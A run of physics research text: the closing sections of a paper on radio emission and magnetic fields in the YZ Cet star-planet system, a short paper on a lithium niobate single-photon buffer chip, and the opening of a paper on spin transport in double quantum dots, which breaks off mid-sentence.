wind (e.g. Lanza, 2009). The value of \(v_{\rm Alf}\) depends on the configuration of the magnetosphere, as it influences the density of the wind and therefore the ram pressure. Defining \(\eta(r)=\frac{B^{2}/8\pi}{1/2\rho v_{\rm w}^{2}}\) the ratio between magnetic to wind energy densities, the Alfven radius \(R_{\rm Alf}\) is where \(\eta(r)=1\). ud-Doula and Owocki (2002) define a "wind magnetic confinement parameter" \(\eta*=B_{\rm B}^{2}R_{*}^{2}/4\dot{M}v_{\rm w}\), which is \(\eta(R_{*})\) at the stellar surface. If \(\eta*\gg 1\), \(R_{\rm Alf}\gg R*\), relatively far from the star. We can define "inner magnetosphere" the region where \(R<R_{\rm Alf}\); here the magnetic field lines are closed (as for mCP stars, see Trigilio et al., 2004). In the equatorial plane, assumed coincident with the orbital plane, \(\eta(r)\) is the local ratio \((v_{\rm Alf}/v_{\rm w})^{2}=M_{\rm A}^{-2}\), with \(M_{\rm A}\) the Alfvenic Mach number (ud-Doula and Owocki, 2002). Inside the inner magnetosphere, \(v_{\rm w}\ll v_{\rm Alf}\). For mid-M type star with moderate or low activity, as YZ Cet, Wood et al. (2021) find that \(\dot{M}\leq 0.2\,\dot{M}_{\odot}\). Adopting \(\dot{M}\approx 10^{-15}M_{\odot}\,{\rm yr}^{-1}\), \(B_{\rm p}\approx 2\,400\,{\rm G}\) (see sect. 6.5) and \(v_{\rm w}=300\,{\rm km\,s^{-1}}\)(Preusse et al., 2005), we get \(\eta*\approx 10^{8}\), meaning that in YZ Cet the wind is strongly confined by the magnetic field. Following Udola et al. (2008), which give \(R_{\rm Alf}\approx 0.3+\eta*^{1/4}R_{*}\) when \(\eta*\gg 1\), we get \(R_{\rm Alf}\approx 100\,R_{*}\), and therefore all the three known planets of YZ Cet are inside the inner magnetosphere. In particular, for YZ Cet, b, \(v_{\rm rel}=85.1\,{\rm km\,s^{-1}}\) (see sect. 6.5), therefore \(v_{\rm rel}\ll v_{\rm w}\ll v_{\rm Alf}\) and the planet moves in the Sub-Alfvenic region. ### The hollow cone model Since ARE is highly directive, being the emission pattern either a hollow cone or a narrow beam, as in the case of the tangent beam emission, it is better to visualize the lightcurve in a polar diagram, as shown in Fig. 2. Here the visibility of the emission can be correlated with the position of planet b along the orbit. We find that the radio emission is detected only when the planet is in Figure 6: Schematic view of the emission pattern of the ARE. Directions are projected in a unitary spherical surface. The ECME pattern is a hollow cone, represented by the blue ring on the sphere. The emission originates in the dipolar field line connecting the planet and the star in the point O and it rotates following the planet. The radiation is direct toward the Earth when the line of sight (point E) intercepts the cone (blue circular corona) between points A-B and C-D. This occurs when the projection E\({}^{\prime}\) of E in the plane of the orbit intercepts the projection of the blue ring (the orange ellipse) between points A\({}^{\prime}\)-B\({}^{\prime}\) and C\({}^{\prime}\)-D\({}^{\prime}\). Figure 7: Projection of one possible configuration in the plane of the orbit (horizontal plane of Fig. 6). The projection of the hollow cone is the area between the orange and the green ellipses. The projection of the line of sight (point E\({}^{\prime}\)) rotates and intercepts the two ellipses between points A\({}^{\prime}\)-B\({}^{\prime}\) and C\({}^{\prime}\)-D\({}^{\prime}\). Here \(i=88^{\circ}\) and E\({}^{\prime}\) describes a circle of radius \(\approx 1\). ARE is visible from Earth when E\({}^{\prime}\) in between A\({}^{\prime}\) and B\({}^{\prime}\) or C\({}^{\prime}\) and D\({}^{\prime}\). O is the origin of the emission. two orbital sectors that are symmetric with respect to the direction of Earth. In the case of the tangent plane beam model, the emission is expected near the quadrature, while here the two sectors are about at \(\pm(30^{\circ}\) to \(80^{\circ}\)) from the direction of the Earth (the two blue sectors in Fig. 2). Therefore, our data are consistent with a hollow cone beam model for the ARE. In this model, the emission occurs in the dipolar flux tube connecting the planet and the star, as shown in Fig. 5. The hollow cone has a semi-aperture \(\theta\) given by \(v/c\), where \(v\) is the velocity of the resonant electrons and \(c\) the speed of light, and a thickness \(\Delta\theta\approx v/c\). The emission is visible from Earth when the line of sight falls inside the walls of the cone. This is shown in the schematic picture of Fig. 6, where the hollow cone intercepts the sphere of unit radius in a circular ring. The points A, B and C, D indicate the moments of start and stop of visibility of ARE before and after the pseudo transit of the planet. Here we assume, for simplicity, that the axis of the dipole of the star coincides with the rotational axis. The visibility depends on \(v/c\), on the location of the source of emission in the dipolar loop, which is defined by the angle \(\psi\), and the inclination \(i\). In order to identify possible values of the parameters, we project the circular emission ring onto the orbital plane, as in Fig. 7. The circular ring is defined by two ellipses that intercept the projection \(\mathrm{E}^{\prime}\) of the line of sight at four points \(\mathrm{A}^{\prime}\), \(\mathrm{B}^{\prime}\) and \(\mathrm{C}^{\prime}\), \(\mathrm{D}^{\prime}\). With this simple geometrical model it is possible to infer that \(v/c\) lies in the range \(0.3-0.8\), and the inclination \(i\) is between \(30^{\circ}\) and \(60^{\circ}\). In Fig. 7 a possible configuration corresponding to the observed emission pattern is shown. The solid angle \(\Omega\) subtended by the cone is defined by \(\theta\) and \(\Delta\theta\), which are given by \(v/c\). For the range of \(v/c\) that we find, \(\Omega\approx 1.8-3\,\mathrm{sr}\). We observe high degree of circular polarization on day 5 and 6, with positive values of Stokes V. This means that, if the emission is in the x-mode, it is produced in the Northern magnetic hemisphere. It is worth noting that the true stellar magnetic field topology and the real geometry of the system (i.e. the dipole axis inclination with respect to the exoplanet orbital plane and respect to the line of sight) are basically unknown. This prevents us from providing firm conclusions regarding some observational evidence, mainly the non-detection of circular polarization on days 3 and 4. We can only suggest that one possible explanation is that on day 3 and 4 we observe radiation emitted from the two hemispheres simultaneously. ### The Stellar magnetic field The spectrum of the ECME is directly connected with the local magnetic field strength \(B\). The frequency of the maser is given by \(\nu=s\cdot 2.8\,B\) MHz, where \(s=1,2,3,4\) is the harmonic number, \(B=B_{\mathrm{p}}(\frac{R_{\mathrm{p}}}{r})^{3}\), \(B_{\mathrm{p}}\) is the magnetic field strength at the pole of the star and \(R\) the radius of the magnetosphere above the pole where the ECME forms in a dipolar topology (Trigilio et al., 2000). We fix \(s=2\) as the first harmonic is likely to be suppressed by the second harmonic of the gyrofrequency of the surrounding plasma (Melrose and Dulk, 1982; Trigilio et al., 2000) and the higher harmonics have a small intensity. The spectra in Fig. 4 seem to point to a lower limit cutoff of about \(\nu_{\mathrm{min}}\approx 500\,\mathrm{MHz}\), which corresponds to \(B_{\mathrm{min}}\approx 90\,\mathrm{G}\) above the stellar pole, at a distance \(r_{\mathrm{max}}\) from the centre. The region of the magnetic loop where the ECME develops can be estimated when the cutoff of the spectrum and the polar magnetic field are known. We have these data for the Jupiter-Io DAM emission and for the mCP star CU Vir. For Io-DAM, the spectrum extends from 3 to 30 MHz (Zarka et al., 2004), with \(B_{\mathrm{P}}=14\,\mathrm{G}\). For CU Vir, Das and Chandra (2021) find that the low frequency cutoff is below their observing band, at about 300 MHz, and the upper frequency cutoff is at about 3000 MHz, with \(B_{\mathrm{P}}=3000\,\mathrm{G}\). For a dipolar field topology, the ECME originates at \(r\approx 1.4-3\,R_{*}\) from the center of the dipole. Assuming the same range of \(r\) for YZ Cet, the polar magnetic field strength is \[B_{\mathrm{p}}=\frac{\nu_{\mathrm{min}}/\mathrm{MHz}}{s\cdot 2.8\cdot(R_{*}/r_{ \mathrm{max}})^{3}}\,\mathrm{G} \tag{1}\] that gives \(B_{\mathrm{p}}\lessapprox 2\,400\,\mathrm{G}\) for \(s=2\). This value is in agreement with what is expected for a M4.5V star (e.g. Kochukhov and Lavail, 2017; Kochukhov and Reiners, 2020) and, in particular, with the value given by Moutou et al. (2017) of 2.2 kG. This is just a first estimate, as the best value of \(B_{\mathrm{p}}\) can be provided only if the whole spectrum, including the high frequency cutoff, is known. The frequency corresponding to the range of \(r\) given above are \(\nu_{\mathrm{max}}-\nu_{\mathrm{min}}\approx 4900-500\,\mathrm{MHz}\), with \(\Delta\nu\approx 4400\,\mathrm{MHz}\). ### The Planetary magnetic field The power emitted by the ECME, inferred from the observations, can be obtained as \[P_{\mathrm{obs}}=F_{\nu}\,\Delta\nu\,2\Omega\,d^{2} \tag{2}\] where \(F_{\nu}=0.5\,\mathrm{mJy}\) is the average flux density of the emission inside the hollow cone, \(\Delta\nu\) is the bandwidth of the ECME (see sect. 6.4), \(\Omega\) the solid angle subtended by the hollow cone of emission (see sect. 6.3) and \(d\) is the distance to the star. The factor 2 accounts for the two hemispheres that we assume emit the same power but at opposite circular polarization. We get \(P_{\mathrm{obs}}\) in the range between \(1.0\times 10^{22}\,\mathrm{erg\,s^{-1}}\) and \(1.7\times 10^{22}\,\mathrm{erg\,s^{-1}}\), corresponding to the range of \(\Omega\). On the other hand, the emitted power \(P_{\mathrm{obs}}\) is a fraction \(\epsilon\) of the incident power \(P_{\mathrm{in}}\) due to the interaction between the stellar magnetosphere and the planet (e.g. Zarka, 2007; Lanza, 2009). This is given by: \[P_{\mathrm{in}}=A\,v_{\mathrm{rel}}B^{2}/8\pi \tag{3}\] where \(A\) is the cross section of the planet, \(v_{\mathrm{rel}}\) is the relative velocity of the planet to the magnetic field of the star and \(B\) the magnetic field of the star at the position \(r\) of the planet. Assuming that the orbital plane coincides with the magnetic equatorial plane of the star, \(B=\frac{1}{2}\,B_{\mathrm{p}}(\frac{R_{\star}}{r})^{3}\). Since for YZ Cet b \(r=21.9\,R_{\star}\), considering that \(B_{\mathrm{p}}\) is an upper limit, \(B\leq 0.1\,\mathrm{G}\). The relative velocity is \(v_{\mathrm{rel}}=|v_{\mathrm{orb}}-v_{\mathrm{cor}}|\), where \(v_{\mathrm{orb}}=87.6\,\mathrm{km\,s^{-1}}\) is the orbital velocity of the planet and \(v_{\mathrm{cor}}=2.5\,\mathrm{km\,s^{-1}}\) is the co-rotational velocity at the position of the planet. If the planet does not have a magnetic field, \(A=\pi\,R_{\mathrm{planet}}^{2}\). In this case \(P_{\mathrm{in}}\leq 4.3\times 10^{21}\,\mathrm{erg\,s^{-1}}\), a value that is smaller than \(P_{\mathrm{obs}}\). Since \(P_{\mathrm{in}}\) must be \(\geq P_{\mathrm{obs}}\), the only possibility is to consider an increase of the cross section \(A\) at least by a factor 2.4 or 4.0 corresponding to the range of \(\Omega\). This means to consider a planetary magnetic field. In this case \(A=\pi\,R_{\mathrm{MP}}^{2}\), where \(R_{\mathrm{MP}}\) is the radius the magnetopause, i.e. the distance from the centre of the planet where its magnetic field strength equals \(B\). The condition \(P_{\mathrm{in}}\geq P_{\mathrm{obs}}\) translate in \(R_{\mathrm{MP}}\geq 1.6\,R_{\mathrm{planet}}\) and \(R_{\mathrm{MP}}\geq 2.0\,R_{\mathrm{planet}}\) corresponding to the range of \(\Omega\). Assuming a dipolar field for the planetary magnetosphere: \[R_{\mathrm{MP}}=R_{\mathrm{planet}}(B_{\mathrm{planet}}/B)^{1/3} \tag{4}\] the above conditions imply \(B_{\mathrm{planet}}\geq 0.4\,\mathrm{G}\) and \(B_{\mathrm{planet}}\geq 0.9\,\mathrm{G}\). Moreover if the "generalized radiomagnetic Bode's law" with \(P_{\mathrm{obs}}/P_{\mathrm{in}}\approx 0.01\)(Zarka, 2007) were valid for our system, the above limits would increase considerably. ## 7 Conclusions Our main finding is the detection of highly circularly polarized radio emission in the YZ Cet system that is consistent with being due to ARE from SPI. The spectrum of the ARE and the correlation with the position of the planet along the orbit allows us to estimate the magnetic field of the star and the characteristics of the emission cone. The comparison between the radiated power and the incident magnetic power allows us to infer the presence of a magnetosphere of the planet. We estimate a lower limit for the magnetic field of the planet YZ Cet b of 0.4 G. If confirmed, this would be the first (indirect) measurement of a planetary magnetic field. We find that the strong radio emission from the interaction between YZ Cet b and its star is detected only when the planet is in two orbital sectors that are symmetric with respect to the direction of Earth. This behavior can be explained within the framework of the hollow cone beam model for the ARE, and is in contrast with the tangent plane beam, where the emission is expected to increase near the quadratures, as found in e.g. the Proxima b - Proxima system (Perez-Torres et al., 2021). Radio follow-up observations of this system will allow us to constrain better some of the most relevant parameters responsible for the observed ARE, e.g., the low- and high-frequency cutoffs, or the solid angle, \(\Omega\) covered by the ARE. We emphasize that our work outlines a promising method for the study of SPI and for the indirect detection of planetary magnetospheres. Both are important in defining the exoplanet environment and hence the possibility of favourable conditions for the evolution of life. We thank the staff of the GMRT who have made these observations possible. The GMRT is run by the National Centre for Radio Astrophysics of the Tata Institute of Fundamental Research. We acknowledge support of the Department of Atomic Energy, Government of India, under project no. 12-R&D-TFR-5.02-0700. BD acknowledges support from the Bartol Research Institute. MPT acknowledges financial support through grants CEX2021-001131-S and PID2020-117404GB-C21 funded by the Spanish MCIN/AEI/ 10.13039/501100011033.
2301.04140
High Resolution On-Chip Thin-Film Lithium Niobate Single-Photon Buffer
We experimentally demonstrate a room-temperature, voltage controlled, short-term quantum photonics memory on a lithium niobate chip. Our chip is capable of resolving 100 ps time steps with 0.74 dB loss per round-trip.
Cagin Ekici, Yonghe Yu, Jeremy C. Adcock, Alif Laila Muthali, Heyun Tan, Hao Li, Leif Katsuo Oxenløwe, Xinlun Cai, Yunhong Ding
2023-01-10T13:17:23Z
http://arxiv.org/abs/2301.04140v1
# High Resolution On-Chip Thin-Filn Lithium ###### Abstract We experimentally demonstrate a room-temperature, voltage controlled, short-term quantum photonics memory on a lithium niobate chip. Our chip is capable of resolving 100 ps time steps with 0.74 dB loss per round-trip. 1 Center for Silicon Photonics for Optical Communication (SPOC), Department of Electrical and Photonics Engineering, Technical University of Denmark, Lyngby, Denmark 2 State Key Laboratory of Optoelectronic Materials and Technologies, School of Electronics and Information Technology, Sun Yat-sen University, Guangzhou 510275, China *[email protected] ## 1 Introduction Short-term quantum photonics memories or single-photon buffers are essential for quantum technologies, since they provide a synchronization scheme for matching independent systems functioning at different speeds. In order to optimize two-photon interference from distant sources in a quantum network, photon buffers having high resolution configurability is needed to store one photon until the other is transmitted [1]. In addition, entangling quantum operations in photonics are generally probabilistic, and such short-term memories play a crucial role to buffer gates of probabilistic nature. Furthermore, approaching ideal single-photon sources based on parametric spontaneous pair generation through temporal multiplexing requires low-loss and controllable photon storage [2, 3]. To date, optical buffers based on delay lines [4], slow light [5], and Bragg scattering four-wave mixing [6] have been introduced. All these techniques either have an excessive loss which is not suitable for quantum applications or are overly sophisticated. Although atomic cloud optical memories are main contenders, they are difficult to integrate, and only operate at specific wavelengths. Therefore, to fulfill the requirements of a single-photon buffer, thin-film lithium niobate (TFLN) based integrated photonics platforms are ideal candidates, since they offer voltage controlled, low-loss and high-speed interferometric switching. In this paper, we experimentally demonstrate an on-chip TFLN single-photon buffer based on recirculating 1 cm-long loop with a round-trip time of 100 ps, i.e. the overall delay can be controlled with 100 ps time resolution, and storage times of up to 1.4 ns (14 round trips). ## 2 Experimental Setup and Results The TFLN single-photon buffer was fabricated on a commercial lithium niobate on insulator (LNOI) platform with top LN thickness of 600 nm. The switch consists of 4.5 mm long LN phase modulator on push-pull mode, exhibiting bandwidth more than 40 GHz, as shown in Fig. 1 (b), and the whole chip insertion loss is less than 6.2 dB (including the coupling loss). Figure 1: (a) Schematics of the experimental setup with a real image of the TFLN chip consisting several buffers. (b) Electro-optic bandwidth (S\({}_{21}\)) measurement. Abbreviations: FPGA: Field-Programmable Gate Array, VOA: Variable Optical Attenuator, UC: Ultrafast Comparator, EA: Electronic Amplifier, TFLN S-PB: TFLN Single-Photon Buffer. The experimental setup is shown in Fig. 1 (a). We conduct the experiments utilizing heavily-attenuated light from a laser (1550 nm, 40 fs pulse duration), i.e. weak coherent state, with 100 MHz repetition rate instead of true single-photon quantum states. The switch control signals are generated via an FPGA and are fed into an ultrafast comparator to obtain a fast fall-rise time. Afterwards, the fast signals are amplified to the \(V_{\pi}\) of the TFLN switch, and are applied to the chip through high speed radio frequency (RF) probes using micropositioners. After storage and read-out for a delay, photons are detected by a superconducting nanowire single-photon detector(s) and recorded by a time-tagger which produces a real-time histogram of the detection event. The experimental results of single photon storage with our TFLN chip is shown in Fig. 2. Normalized histogram counts for the first 5 round-trip are depicted in Fig. 2 (a). The round-trip loss performance of the chip as a function of time is exhibited in Fig. 2 (b). Each peak value after a round-trip has been fitted the line with slope 0.74 dB. Accordingly, we measure the second-order correlation function \(g^{(2)}(0)\) after each round-trip by adding a 50/50 fiber optic beam splitter before the detection, see Fig. 2 (c). As expected \(g^{(2)}(0)\approx 1\), since our TFLN photonics chip is illuminated by a weak coherent state. As a result of constant \(g^{(2)}(0)\approx 1\) for every round-trip, it can be inferred that the statistics do not change significantly as a function of a storage time and there is no substantial optical background noise owing to the absence of an optical pump beam [7]. ## 3 Conclusion We present an experimental study of a recirculating on-chip TFLN single-photon buffer enabling single photons to be captured, stored, and read-out at will with 100 ps time step resolution in a reliable way. Our promising chip is a robust and scalable architecture working at room-temperature with low-loss around 0.74 dB per round-trip.
2302.12272
Photo-assisted spin transport in double quantum dots with spin-orbit interaction
We investigate the effect of spin-orbit interaction on the intra- and interdot particle dynamics of a double quantum dot under ac electric fields. The former is modeled as an effective ac magnetic field that produces electric-dipole spin resonance transitions, while the latter is introduced via spin-flip tunneling amplitudes. We observe the appearance of non-trivial spin-polarized dark states, arising from an ac-induced interference between photo-assisted spin-conserving and spin-flip tunneling processes. These dark states can be employed to precisely measure the spin-orbit coupling in quantum dot systems. Furthermore, we show that the interplay between photo-assisted transitions and spin-flip tunneling allows the system to operate as a highly tunable spin filter. Finally, we investigate the operation of the system as a resonant flopping-mode qubit for arbitrary ac voltage amplitudes, allowing for high tunability and enhanced qubit control possibilities.
David Fernández-Fernández, Jordi Picó-Cortés, Sergio Vela Liñán, Gloria Platero
2023-02-23T19:00:04Z
http://arxiv.org/abs/2302.12272v2
# Photo-assisted spin transport in double quantum dots with spin-orbit interaction ###### Abstract We investigate the effect of spin-orbit interaction on the intra- and interdot particle dynamics of a double quantum dot under ac electric fields. The former is modeled as an effective ac magnetic field that produces electric-dipole spin resonance transitions, while the latter is introduced via spin-flip tunneling amplitudes. We observe the appearance of non-trivial spin-polarized dark states, arising from an ac-induced interference between photo-assisted spin-conserving and spin-flip tunneling processes. These dark states can be employed to precisely measure the spin-orbit coupling in quantum dot systems. Furthermore, we show that the interplay between photo-assisted transitions and spin-flip tunneling allows the system to operate as a highly tunable spin filter. Finally, we investigate the operation of the system as a resonant flopping-mode qubit for arbitrary ac voltage amplitudes, allowing for high tunability and enhanced qubit control possibilities. * 27 February 2023 _Keywords_: semiconductor quantum dots, spin-orbit coupling, quantum transport, spin qubits, dark states, ac-driving dynamics and transport, electron dipole spin resonance ## 1 Introduction Semiconductor spin qubits are among the most promising platforms for the implementation of quantum computing [1, 2, 3, 4, 5, 6, 7, 8]. Some of their main advantages are the long coherence times and the promise of high scalability to achieve the large number of qubits needed for the realization of quantum algorithms [9, 10, 11, 12, 13, 14]. In these systems, qubits are encoded in the spin states of electrons or holes localized in quantum dots (QDs). Manipulation of the qubit states can be performed employing electron spin resonance (ESR) [15, 16, 17, 18] by applying an oscillating magnetic field. However, the localization of the ac magnetic fields needed to address individual dots is experimentally challenging [15]. To overcome this limitation, an effective ac magnetic field is generated by electrically driving the particle in a material with strong spin-orbit coupling (SOC) [19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30], a magnetic field gradient [31, 32, 33], a spatially dependent hyperfine field [34, 35], or modulated anisotropies of the effective \(g\)-factor [36, 37, 38]. All these alternatives allow for electrical manipulation via the so-called electric-dipole spin resonance (EDSR), which in recent years has been widely employed to obtain high-fidelity one- and two-qubit gates [39, 40, 41, 42, 43, 44, 45, 46, 47]. In a double quantum dot (DQD), the particle (electron or hole) is delocalized between the two sites, giving rise to molecular-like orbitals. The addition of an ac electric or magnetic field results in unusual properties that arise from quantum coherence and, in particular, from quantum interferences. Some of the most relevant examples in QD systems are charge and spin dynamical localization [48, 49, 50, 51], spin filtering [52, 53, 54], or long-range transfer mediated by photo-assisted tunneling (PAT) [55, 56, 57]. These effects can be analyzed using Floquet theory [58, 59, 60], which is an excellent tool for addressing time-periodic Hamiltonians. Although all of these phenomena have been widely studied both theoretically and experimentally, the consequences of adding a strong SOC have only begun to be extensively analyzed in recent years [61, 62, 63, 64]. In particular, the transport signatures under both strong SOC and large ac voltage amplitudes have not been widely investigated. Transport through such a system is characterized by a spin-polarized current due to the finite probability of spin-flip tunneling between states of opposite spin in different QDs. In the presence of an ac electric field, these transitions can occur with the absorption or emission of one or more photons. We analyze the current and spin polarization through the system, including the effect of excited states via an effective magnetic field. Furthermore, within a certain parameter configuration, we find a set of non-trivial dark states (DS) in which the interference between PAT spin-conserving and spin-flip transitions occurs. These processes yield a complex and nonlinear current output with remarkable features, including a potential read-out mechanism of the SOC. Lastly, we consider the possibility of employing the setup as a flopping-mode qubit, in which virtual transitions between the QDs in the presence of a strong SOC allow for fully coherent manipulation of the spin. The flopping-mode qubit has recently gained attention as a promising platform for quantum computing in solid-state systems [65, 66, 67]. ## 2 Theoretical framework We consider the following Hamiltonian for the DQD (\(\hbar=1\)) \[\hat{H}\left(t\right) = \hat{H}_{0}(t)+\hat{H}_{1}(t), \tag{1a}\] \[\hat{H}_{0}(t) = \sum_{\eta;\sigma}\epsilon_{\eta}(t)\hat{d}_{\eta,\sigma}^{ \dagger}\hat{d}_{\eta,\sigma}+\sum_{\eta}\frac{E_{z}}{2}\hat{\sigma}_{z,\eta} \tag{1b}\] \[+\sum_{\eta\neq\eta^{\prime};\sigma,\sigma^{\prime}}\tau_{\eta, \sigma;\eta^{\prime}\sigma^{\prime}}\left(\hat{d}^{\dagger}_{\eta,\sigma}\hat{d} _{\eta^{\prime},\sigma^{\prime}}+h.c.\right),\] \[\hat{H}_{1}(t) = \sum_{\eta}\frac{\beta_{\eta}(t)}{2}\hat{\sigma}_{x,\eta},\] (1_c_) where \(\hat{d}_{\eta,\sigma}\) (\(\hat{d}^{\dagger}_{\eta,\sigma}\)) is the annihilation (creation) operator at site \(\eta\in\{\rm L,R\}\), with spin \(\sigma\in\{\uparrow,\downarrow\}\). The first term in \(\hat{H}_{0}\) represents the QD energy levels \(\epsilon_{\eta}(t)\), which can be controlled by electric gates applied to individual dots. We consider a sinusoidal time-dependent gate in the leftmost dot: \(\epsilon_{\eta}(t)=\epsilon_{\eta,0}+\epsilon_{\rm ac}\cos(\omega t)\delta_{ \eta,\rm L}\). The second term is the Zeeman splitting \(E_{z}=g\mu_{\rm B}B_{z}\), due to the external magnetic field \(B\) applied perpendicularly to the QDs plane. The third term represents the hopping between dots. We consider two possible tunneling paths: a spin-conserving path \(\propto\delta_{\sigma,\sigma}\) of amplitude \(\tau_{0}\) and a spin-flip path with \(\sigma\neq\sigma^{\prime}\) of amplitude \(\tau_{\rm sf}\) that arises due to the SOC. The direction of the SOC determines the form of the spin-flip tunneling term. Using the SOC vector [68, 66]\(\mathbf{\alpha}\), the spin-flip term is \(\propto\mathbf{\alpha}\cdot\hat{\mathbf{\sigma}}\). Here, without loss of generality, we consider \(\mathbf{\alpha}\) in the y-direction, such that \(\tau_{\rm sf}\in\mathds{R}\) (see A). Note that we have not included a Coulomb interaction term as we will focus on the single-particle dynamics. The Hamiltonian above does not explicitly include excited states of the QD confining potential. However, in combination with the SOC and an ac electric field, the intra-dot dynamics result in the appearance of an effective magnetic field [69], as employed for the manipulation of spin qubits in EDSR protocols. In the present model, this effective magnetic field is contained in \(\hat{H}_{1}(t)\). We derive this term in the context of a Schrieffer-Wolff transformation (SWT) in A. Under SOC, inter- and intra-dot Figure 1: Schematic picture of a DQD in the x-y plane, connected to unpolarized contacts. Particles can enter through the left lead and exit to the right one with tunneling rates \(\Gamma_{\rm S,L}\) and \(\Gamma_{\rm D,R}\), respectively. A uniform magnetic field is applied pointing in the z-direction. The particle can tunnel between QDs following a spin-conserving path \(\tau_{0}\). Additionally, due to the SOC, a spin-flip tunneling \(\tau_{\rm sf}\) is also present. Finally, an ac electric field is applied to the left gate \(\epsilon_{\rm L}(t)\), which in combination with the SOC gives rise to the OME term \(\beta(t)\) (see text). dynamics yield distinct contributions to the spin motion [70]. Hence, we will refer to this term as the orbital magneto-electric effect (OME) in order to distinguish it from the similar effective magnetic field that arises due to the inter-dot dynamics of the spin, which we refer to as the tunneling magneto-electric effect (TME). This effect appears as a result of a finite spin-flip tunneling amplitude, and we discuss it in more detail in section 5. The OME is orthogonal to the SOC vector and therefore we consider it along the x-direction. Moreover, for a homogeneous electric field along the axis of the DQD, the OME term is the same in both dots \(\beta_{\rm L}(t)=\beta_{\rm R}(t)=\beta(t)\). Here, we consider \(\beta(t)=\beta_{\rm SO}\cos(\omega t)\), with \(\beta_{\rm SO}\in\mathds{R}\). Note that the frequency of the OME term is the same as \(\epsilon_{L}(t)\), as it arises from the same applied voltage. The static contribution to the electric field produces only a negligible rotation of the spin axis, and we disregard this effect in the following (see A). Finally, we remark that the OME term appears only for \(E_{z}\neq 0\), which is needed to break time-reversal symmetry. In the case where \(E_{z}\) is small, the hyperfine interaction may produce an equivalent effect [69]. The total Hamiltonian, written on the basis \(\{|L\uparrow\rangle,|L\downarrow\rangle,|R\uparrow\rangle,|R\downarrow \rangle\}\), reads \[\hat{H}=\left(\begin{array}{cccc}\epsilon_{L}(t)+E_{z}/2&\beta(t)/2&-\tau_{ 0}&-\tau_{\rm sf}\\ \beta(t)/2&\epsilon_{L}(t)-E_{z}/2&\tau_{\rm sf}&-\tau_{0}\\ -\tau_{0}&\tau_{\rm sf}&\epsilon_{R}+E_{z}/2&\beta(t)/2\\ -\tau_{\rm sf}&-\tau_{0}&\beta(t)/2&\epsilon_{R}-E_{z}/2\end{array}\right). \tag{2}\] We consider the following parameter to characterize the relationship between the spin-conserving and spin-flip tunneling amplitudes \[\chi\equiv\frac{1}{\tau_{0}/\tau_{\rm sf}+1}, \tag{3}\] so that \(\chi=0\) corresponds to \(\tau_{\rm sf}=0\), and \(\chi=1\) to \(\tau_{0}=0\). We normalize the tunneling rates so that \(\tau_{0}+\tau_{\rm sf}=\tau\). Most systems exhibit a spin-flip contribution to tunneling that is much smaller compared to the spin-conserving one [71]. However, an applied external field can be employed to tune the SOC and therefore the spin-flip contribution, e.g., in GaAs-based hole QDs [72, 73]. Spin polarization in the external leads can further produce synthetic SOC in DQDs [74]. Therefore, we investigate arbitrary values of \(\chi\) in the following. Current readout is performed by coupling the QD chain to a source (S) and drain (D) leads. The coupling between the leads and the QD chain is given by \[\hat{H}_{\Gamma}=\sum_{l,\mathbf{k},\sigma,\eta}(\gamma_{l,\eta}\hat{c}^{\dagger} _{l,\mathbf{k},\sigma}\hat{d}_{\eta,\sigma}+h.c.), \tag{4}\] with \(\hat{c}_{l,\mathbf{k},\sigma}\) the annihilation operator for a particle in the lead \(l=\{S,D\}\), with spin \(\sigma\) and momentum \(\mathbf{k}\). We consider the coupling between the leads and the QD chain to be spin-conserving. We further consider the infinite bias limit, so that transport is unidirectional from source to drain. Additionally, in this limit, all the side-bands couple equally to the source lead. Thus, following the property of the Bessel functio \(\sum_{n}J_{n}(\epsilon_{\rm ac}/\omega)^{2}=1\), we can neglect the effect of the renormalization of \(\gamma_{l,\eta}\) due to the ac electric field [55]. We consider the dynamics of the system via its reduced density matrix \(\hat{\rho}(t)\), which, under a Markovian approximation, satisfies the master equation \[i\frac{d}{dt}\hat{\rho}(t)=[\hat{H}(t),\hat{\rho}(t)]+{\cal K}\hat{\rho}(t), \tag{5}\] where \[{\cal K}\hat{\rho}=\sum_{\sigma} \left[\Gamma_{\rm S,L}\left(\hat{d}^{\dagger}_{L,\sigma}\hat{\rho }\hat{d}_{L,\sigma}-\frac{1}{2}\left\{\hat{d}_{L,\sigma}\hat{d}^{\dagger}_{L, \sigma},\hat{\rho}\right\}\right)\right. \tag{6}\] \[\left.+\Gamma_{\rm D,R}\left(\hat{d}_{R,\sigma}\hat{\rho}\hat{d}^ {\dagger}_{R,\sigma}-\frac{1}{2}\left\{\hat{d}^{\dagger}_{R,\sigma}\hat{d}_{R,\sigma},\hat{\rho}\right\}\right)\right],\] is the kernel superoperator for weak coupling in the infinite bias approximation. Transition rates due to coupling with leads are defined as \(\Gamma_{l,\eta}=2\pi/|\gamma_{l,\eta}|^{2}D_{l}(\epsilon_{F})\), where \(D_{l}(\epsilon)\) is the density of states of the lead \(l\) and \(\epsilon_{F}\) is the Fermi energy. We consider the case of strongly interacting QDs, where the energy difference between the single- and double-occupied states is much larger than that of the rest of the energy scales of the system, allowing us to investigate charge transport in the single-charge section of the stability diagram. The steady-state current can then be calculated as \[I^{\infty}=e\sum_{\sigma}\Gamma_{\rm D,R}\rho^{\infty}_{\rm R\sigma}, \tag{7}\] where \[\rho^{\infty}_{\rm R\sigma}=\lim_{t\rightarrow\infty}\frac{1}{T}\int_{t}^{t+T }ds\langle{\rm R}\sigma|\hat{\rho}(s)|{\rm R}\sigma\rangle, \tag{8}\] is the occupation of the rightmost dot with spin \(\sigma\) in the stationary state averaged over one period \(T=2\pi/\omega\) of the ac voltage. In the following, we consider an identical coupling to both leads, so that \(\Gamma_{\rm S,L}=\Gamma_{\rm D,R}=\Gamma\). ## 3 Quantum transport in DQD with spin-orbit interaction In the case where \(E_{z}\sim 0\), quantum transport occurs only close to zero detuning \(\delta\equiv\epsilon_{R,0}-\epsilon_{L,0}=0\), where the levels of the two dots are aligned. The presence of an ac field changes this picture by allowing for PAT in which the particle can tunnel from one dot to the other one by absorbing or emitting a certain number of photons. Then, an \(n-\)photon resonance occurs for \(\delta=n\omega,\ n\in\mathds{Z}\). For \(E_{z}\neq 0\), the degeneracy of the spin doublets is broken, resulting in a current that will generally be spin polarized. Then, we can distinguish several processes, schematized in figure 2. First, spin-conserving resonances with either no photons (process 1), also known as direct resonance, or with the emission/absorption of a photon (process 4). As in the case without a magnetic field, these occur at \(\delta=n\omega\), in which the particle can tunnel directly from one dot to the other. These resonances survive the presence of a magnetic field, since the difference in energy between one particle with the same spin in different dots is also \(\delta\). Moreover, since the levels are now split in spin by the 